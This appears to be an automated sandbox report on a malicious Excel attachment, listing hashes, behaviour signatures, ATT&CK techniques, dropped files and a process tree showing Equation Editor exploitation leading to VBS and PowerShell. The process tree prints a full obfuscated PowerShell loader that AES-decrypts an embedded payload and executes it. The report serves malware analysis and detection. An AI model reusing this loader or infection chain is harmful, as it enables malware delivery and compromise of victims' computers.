f9541983f2c2e2f0a0a72dce180342d0637a52a4ba6e49ea42e8c5844d4de9e3

General

Target

AWD 490104998518.xls
Size

1.2MB
MD5

f63c009bccbc4d8d26d162a168feaeb1
SHA1

fa8ab13582703932f968a31e6cc0973e45ca43e0
SHA256

f9541983f2c2e2f0a0a72dce180342d0637a52a4ba6e49ea42e8c5844d4de9e3
SHA512

56a099036928c0af89d6a4cde7977cf5f3a5626a028aabea8a4dc590dd582c395042ae2c4f05b8085b81a9d19fb12f18beea0fe145712f057ffc12028e063395
SSDEEP

24576:D6sKGQKr9+FZF+S0ANklw1Q1Ftt5Kj1G8RjM78quuH6OBrNoDgYEMuFh:9Hr9+FZQNw1Q1l5oGYjMhuu3BRo0Yr+

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
11	1708	EQNEDT32.EXE
12	1028	powershell.exe

Abuses OpenXML format to download file from external location

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1028	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1708	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1760	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1028	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1028	powershell.exe
Token: SeShutdownPrivilege	2536	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1760	EXCEL.EXE
1760	EXCEL.EXE
1760	EXCEL.EXE
2536	WINWORD.EXE
2536	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1708 wrote to memory of 780	1708	EQNEDT32.EXE	33
PID 1708 wrote to memory of 780	1708	EQNEDT32.EXE	33
PID 1708 wrote to memory of 780	1708	EQNEDT32.EXE	33
PID 1708 wrote to memory of 780	1708	EQNEDT32.EXE	33
PID 780 wrote to memory of 1028	780	WScript.exe	34
PID 780 wrote to memory of 1028	780	WScript.exe	34
PID 780 wrote to memory of 1028	780	WScript.exe	34
PID 780 wrote to memory of 1028	780	WScript.exe	34
PID 2536 wrote to memory of 1784	2536	WINWORD.EXE	36
PID 2536 wrote to memory of 1784	2536	WINWORD.EXE	36
PID 2536 wrote to memory of 1784	2536	WINWORD.EXE	36
PID 2536 wrote to memory of 1784	2536	WINWORD.EXE	36

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\AWD 490104998518.xls"
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1760

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2536
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1784

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1708
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\creatednewwaterbottleform.vBS"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:780
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{7BD7F3F9-6CF2-4A4A-BC63-46B9EAC2ED1D}.FSD

Filesize
128KB

MD5
50c03fa16fdf5a8dc024333c4d6322f8

SHA1
222367043a1b6afc0a895a6e56f6a63d598aac86

SHA256
1b2f97568ba5a2edc394f7106fb2549f2db3f26334fe5a816f12b1c2915e0ae8

SHA512
8edf05a191797c4be178334ee390794a52565bf9e923367f5bd6e7052e9fc34f2e48dd94913237661dc3b85b57fa67ca53bbe75e29a11a4388fa5045eb4e77ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
06affedb3acc140be7fa458b6485a664

SHA1
44394b6dc8abdf00f3ac4e38ea52c807b45a655b

SHA256
454678244de989a1c49b4bfdbc4581c864364f81dedc3f97b39a0ef8c232b18a

SHA512
697e584f399a1608daa92b41a761cbea345356d91b7119bb7726937b424747664df6802e86820d56fb66c6a83526a64b02e7ce58a596102a163af5bee6685b22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{DB1EAE14-EBAB-4E09-A703-847628820889}.FSD

Filesize
128KB

MD5
1d480e311ca4db15b0d02303767869ba

SHA1
86a1d83bc1ae7513c54a8f73aa8127a6a414c004

SHA256
0840c3e53855eb156e0f4c0d3d0923e78ce0da65409f974723cd413ec00a4868

SHA512
3dcea1b828e006217439476780c09d7cd8c17d5820419ad3ba45df5b2e5c0714c03c9068d41723c8fa26979975bd71b6d596104653d150da8a73e25c9e578168

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc

Filesize
83KB

MD5
e03f3290788de4d7a103f16b780b3cce

SHA1
c220e79a2714ed59f4d7b1d0a4f6c63a03772ea6

SHA256
db4fed8fb3c35582ade2fa57a5866ec7795e94bff34f004f66d15233d1a2fcd8

SHA512
9372b124ecb895a5c7672d75d17eb3ea3d91fab5ed675aa82090d8d00c15cb4477553342a356c4f8616869c2987105e6468bb2a912196dab055e06e34ad24b63

Download Submit
C:\Users\Admin\AppData\Local\Temp\{1D57E044-7616-45D9-AAF4-163CA8B4DACE}

Filesize
128KB

MD5
75a65fd301e7502f04f4e1283667ec0f

SHA1
880133e60c726ba309f61c970678da2fcefb7346

SHA256
6722282816329e4c984c07ce9fc8ef5253c1b568121fe8f65fb4c21c1fa58301

SHA512
ef8f8d6fca21f478629089b98661590e6f8960291385a24e511846cf232f54aadeccb6d28578bcd6129a85887b1fa02039386b620b696ccfbd47cc4f65fc7eaa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
acf86365f0b275c45dde8e7b3b4310ff

SHA1
fc440f05f848894b685ea253a3cac557274b94e7

SHA256
9b71bb48753fc95d6afb442ed1376ce45662e84c06b2ebebb07938e209b017d5

SHA512
b14fdf898bd95b4f42ae3657122340a958c16eae64b934e9641818174fdaa63110c26de9d6ce59d201d5b6e34a641c5e15aa94a750a99703af888651dc075859

Download Submit
C:\Users\Admin\AppData\Roaming\creatednewwaterbottleform.vBS

Filesize
409KB

MD5
94734cb139b6b9025fd8a1acc56027db

SHA1
b385368bcaadaca073849a413660b68e690ffba5

SHA256
7dde4d5f845dbb2a078f6d0a290472d22cc845c6d6927cc0ada645ce050c7b08

SHA512
58e0064f4b304b5503c4a7e689d96cc62bac4bc8ee76d39fede408b9e777b9602334dad4e1570fa0b9e0c363e7d8ee419a41d4da02493d174d61f96acca4053f

Download Submit
memory/1760-92-0x0000000072A0D000-0x0000000072A18000-memory.dmp

Filesize
44KB

Download
memory/1760-8-0x0000000002E20000-0x0000000002E22000-memory.dmp

Filesize
8KB

Download
memory/1760-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1760-1-0x0000000072A0D000-0x0000000072A18000-memory.dmp

Filesize
44KB

Download
memory/2536-7-0x00000000036A0000-0x00000000036A2000-memory.dmp

Filesize
8KB

Download
memory/2536-5-0x0000000072A0D000-0x0000000072A18000-memory.dmp

Filesize
44KB

Download
memory/2536-93-0x0000000072A0D000-0x0000000072A18000-memory.dmp

Filesize
44KB

Download
memory/2536-3-0x000000002FA01000-0x000000002FA02000-memory.dmp

Filesize
4KB

Download
memory/2536-116-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2536-117-0x0000000072A0D000-0x0000000072A18000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing